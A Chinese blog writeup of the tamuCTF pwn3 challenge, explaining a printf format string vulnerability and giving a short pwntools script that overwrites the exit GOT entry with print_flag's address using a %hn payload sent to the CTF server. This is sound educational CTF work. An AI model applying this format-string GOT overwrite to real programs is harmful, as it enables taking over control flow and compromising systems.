格式化字符漏洞 tamuCTF pwn3 writeup

之前一直不怎么会格式化字符串的漏洞,刚好碰上这道题,学习一波

首先看下main函数,读一个字符串,然后打印出来,之后直接exit(0) 无法利用栈溢出跳转,但是prinf是直接打印读取的东西,这里就存在一个格式化字符串漏洞。
这里写图片描述

这里推荐一个格式化字符串漏洞入门的教程:
http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html
建议看完这个教程之后再来看我的wp

首先看一下字符串在第几个参数,这里可以看出是第4个参数,其实也可以用gdb看内存看出来,只不过麻烦一点。
这里写图片描述

看了下,它自带了print_flag()函数,那么思路就很明显,只要利用格式化字符串漏洞覆写got表,将exit的地址改成print_flag()的地址就行

下面就是脚本

from pwn import *


#p = process('./pwn3')
p=remote('pwn.ctf.tamu.edu',4323)
exit_got=0x0804A01C #这里是要exit的got表所在地址
payload=p32(exit_got)+'%'+str(34219-4)+'x%4$hn' #首先写上要覆写的地址,然后% str(34219)x就是要向所在地址写入的值,%4$hn,就是代表向第四个参数所在的地址写入前面的值
p.sendline(payload)
flag=p.recvall()
print flag
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值